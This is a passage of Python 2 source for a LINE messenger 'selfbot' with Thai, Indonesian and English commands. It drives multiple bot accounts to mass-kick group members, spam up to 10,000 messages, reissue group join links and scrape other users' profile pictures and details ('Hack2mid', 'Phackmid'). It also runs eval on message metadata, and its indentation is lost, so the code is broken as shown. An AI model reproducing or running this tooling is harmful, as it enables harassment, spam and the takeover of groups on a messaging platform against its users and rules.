result = result.split("<")[0]
path = "http://chart.apis.google.com/chart?chs=480x80&cht=p3&chtt=" + result + "&chts=FFFFFF,70&chf=bg,s,000000"
urllib.urlretrieve(path, "steal.png")
tts = gTTS(text=result, lang='id')
tts.save('tts.mp3')
cl.sendImage(msg.to,"steal.png")
cl.sendText(msg.to,"DITAMPILKAN UNTUK TEXT\n" + "" + kata + "\n「SUKSES」")
cl.sendAudio(msg.to,'tts.mp3')
#========================================
elif "/ปก @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("/ปก @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Hack2mid:" in msg.text:
umid = msg.text.replace("Hack2mid:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "/รูป" in msg.text:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("/รูป","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Gak da orange")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithUrl(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
elif msg.text in ["Sp","sp","Speed"]:
cl.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Bot Speed"]:
ki1.sendText(msg.to, "Progress.......")
start = time.time()
time.sleep(0.001)
elapsed_time = time.time() - start
ki1.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
ki6.sendText(msg.to, "%sseconds" % (elapsed_time))
ki7.sendText(msg.to, "%sseconds" % (elapsed_time))
ki8.sendText(msg.to, "%sseconds" % (elapsed_time))
ki9.sendText(msg.to, "%sseconds" % (elapsed_time))
ki10.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Keybot"]:
ki1.sendText(msg.to, "[SELFBOT\nBy.☬ARIFISTIFIK☬]\n\n❂͜͡☆➣ Namelock on\n❂͜͡☆➣ Namelock off\n❂͜͡☆➣ Blockinvite on\n❂͜͡☆➣ Blockinvite off\n❂͜͡☆➣ Backup on\n❂͜͡☆➣ Backup off\n\n[By.☬ARIFISTIFIK☬]")
#========================================
elif msg.text in ["กลับร่าง","Mebb"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#=================================================
elif msg.text == "#mid on":
cl.sendText(msg.to, "Done..")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "#mid off":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "%s\n\n%s\nReadig point creation:\n [%s]\n" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Lurking dulu dudul Baru bilang result Point.")
#========================================
#-------------------Fungsi spam finish----------------------------
elif "รูปกลุ่ม" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "#Turn off bots" in msg.text:
if msg.from_ in admsa:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------
elif msg.text in ["ลิ้ง","url"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]\nline://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifedbot on","เปิดเเจ้งเตือนบอท","Mbot on"]:
if msg.from_ in admin:
if wait["Notifedbot"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
else:
wait["Notifedbot"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed On\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนบอทเเล้ว")
elif msg.text in ["Notifedbot off","ปิดแจ้งเตือนบอท","Mbot off"]:
if msg.from_ in admin:
if wait["Notifedbot"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนบอทเเล้ว")
else:
wait["Notifedbot"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All bot Notifed Off\n\nปิดเเจ้งเเตือนบอทเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนบอทเเล้ว")
#=================================================
elif "Spam " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Mid @" in msg.text:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif msg.text in ["เปิดหมด","Phet All on","Phet all on"]:
cl.sendText(msg.to,"[SELF BOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn on all protection")
cl.sendText(msg.to,"Qr:on")
cl.sendText(msg.to,"Backup:on")
cl.sendText(msg.to,"Read:on")
cl.sendText(msg.to,"Respon:on")
cl.sendText(msg.to,"Responkick:on")
cl.sendText(msg.to,"Protect:on")
cl.sendText(msg.to,"Namelock:on")
cl.sendText(msg.to,"Blockinvite:on")
elif msg.text in ["ปิดหมด","Phet All off","Phet all off"]:
cl.sendText(msg.to,"[SELFBOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to,"Please wait......")
cl.sendText(msg.to,"Turn off all protection")
cl.sendText(msg.to,"Qr:off")
cl.sendText(msg.to,"Backup:off")
cl.sendText(msg.to,"Read:off")
cl.sendText(msg.to,"Respon:off")
cl.sendText(msg.to,"Responkick:off")
cl.sendText(msg.to,"Protect:off")
cl.sendText(msg.to,"Namelock:off")
cl.sendText(msg.to,"Blockinvite:off")
cl.sendText(msg.to,"Link off")
elif msg.text in ["ทีมงาน"]:
msg.contentType = 13
cl.sendText(msg.to, "[TEAM SELFBOT]\n[By.☬ARIFISTIFIK☬]")
cl.sendText(msg.to, "ผู้สร้าง.. SELFBOT\nBy.🔯ARIFISTIFIK🔯")
msg.contentMetadata = {'mid': 'u65224f4e8812136f01b25275a54b5aef'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ผู้จัดการ .SELFBOT\nBy.☬ARIFISTIFIK☬")
msg.contentMetadata = {'mid': 'u6c8aab6ee167a596be2cf045ee2f90df'}
cl.sendMessage(msg)
cl.sendText(msg.to, "หวานใจ\nBy.ผู้สร้างพญาไฟ")
msg.contentMetadata = {'mid': 'u2743230861d1c637647d9ca2a8c1fc14'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ประธาน:")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รองประธาน:💫 By. พยัค")
msg.contentMetadata = {'mid': 'u7988143c47d3faacf1856a72011eea93'}
cl.sendMessage(msg)
cl.sendText(msg.to, "รปภ.:SELFBOT")
msg.contentMetadata = {'mid': 'u5b671f4148aa5bbec186b5b7cb295271'}
cl.sendMessage(msg)
cl.sendText(msg.to, "ตัวเเทนสมาชิก:By.บอล")
msg.contentMetadata = {'mid': 'ueabd832a84add1392a2ff758f97b3c8e'}
cl.sendMessage(msg)
#========================================
elif "#คท" in msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to+"',"}
cl.sendMessage(msg)
elif "บิน" in msg.text:
if msg.toType == 2:
print "Kickall ok"
_name = msg.text.replace("บิน","")
gs = ki1.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
gs = ki7.getGroup(msg.to)
gs = ki8.getGroup(msg.to)
gs = ki9.getGroup(msg.to)
gs = ki10.getGroup(msg.to)
ki1.sendText(msg.to, "Hello all...😁😁 {}")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
# ki1.sendText(msg.to,"Not found.")
else:
for target in targets:
if not target in Bots:
try:
klist=[ki1,ki2,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
# ki3.sendText(msg,to,"Nuke Finish")
# ki2.sendText(msg,to,"
elif msg.text in ["Kill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Fuck You")
return
for jj in matched_list:
try:
klist=[ki1,ki2,ki10]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("PK4 " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
except:
ki6.sendText(msg.to,"Error")
elif "KK2 " in msg.text:
nk0 = msg.text.replace("KK2 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki2.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
elif "KK1 " in msg.text:
nk0 = msg.text.replace("KK1 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki1.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki1.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "contactjoin:" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
amid = msg.text.replace("contactjoin:","")
cl.sendText(msg.to,str(cl.channel.createAlbumF(msg.to,name,amid)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif ("PK2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("PK3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("PK " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "สั่งดำ @" in msg.text:
_name = msg.text.replace("Blacklist @","")
_kicktarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Boss")
except:
cl.sendText(msg.to,"error")
elif "แบน @" in msg.text:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("แบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน @" in msg.text:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("ลบแบน @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear ban","ล้างดำ"]:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Ban"]:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unban"]:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","Mcheck"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Me ban","Cekban","Mcheck mid"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
#=============================================
elif msg.text in ["Simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Success activated simisimi")
elif msg.text in ["Simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Success deactive simisimi")
elif msg.text in ["เปิด อ่าน","Read on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"เปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["ปิด อ่าน","Read off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"ปิดอ่านข้อความอัตโนมัติ.👌")
elif msg.text in ["Tag on","Autorespon:on","Respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["Tag off","Autorespon:off","Respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
elif msg.text in ["Tag1","Tag1"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag1"]))
elif msg.text in ["Tag2","Tag2"]:
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ\n\n" + str(wait["tag2"]))
elif "Tag1:" in msg.text:
wait["tag1"] = msg.text.replace("Tag1: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif "Tag2:" in msg.text:
wait["tag2"] = msg.text.replace("Tag2: ","")
cl.sendText(msg.to,"ข้อความแทคล่าสุดคือ")
elif msg.text in ["Kicktag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"Auto Kick ON")
elif msg.text in ["Kicktag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"Auto Kick OFF")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
#==============================================================================#
#==============================================================================#
elif "Phackmid:" in msg.text:
saya = msg.text.replace("Phackmid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Phackgid:" in msg.text:
saya = msg.text.replace("#Phackgid:","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist","เช็คเพื่อนทั้งหมด","#เพื่อน","เพื่อนทั้งหมด","Fyall"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════รายชื่อเพื่อน═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อย════════\n\nเจำนวนเพื่อน : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["เพื่อน","Memlist","Nameall"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════รายชื่อเพื่อน═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n════════รายชื่อเพื่อน════════\n\nจำนวนเพื่อน : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
elif "#Friendpict:" in msg.text:
saya = msg.text.replace('#Friendpict:','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Blocklist","บล็อค","Pbann"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═══════รายชื่อ ที่บล็อค═══════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n══════รายชื่อ ที่บล็อค══════\n\nจำนวนที่บล็อค : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#Myginfoall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#ไอดีกลุ่ม","Myginfogidall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="════════ไอดี กลุ่ม════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n════════ไอดี กลุ่ม═══════\n\nไอดีกลุ่มรวม : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "1991258ชื่อกลุ่ม" in msg.text:
saya = msg.text.replace('1991258ชื่อกลุ่ม','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Gid" in msg.text:
saya = msg.text.replace('Gid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif msg.text in ["ลิสกลุ่ม","#Meginfoall"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif "แทค" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "[SELF BOT\n[By.☬ARIFISTIFIK☬]:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif "lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "เปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
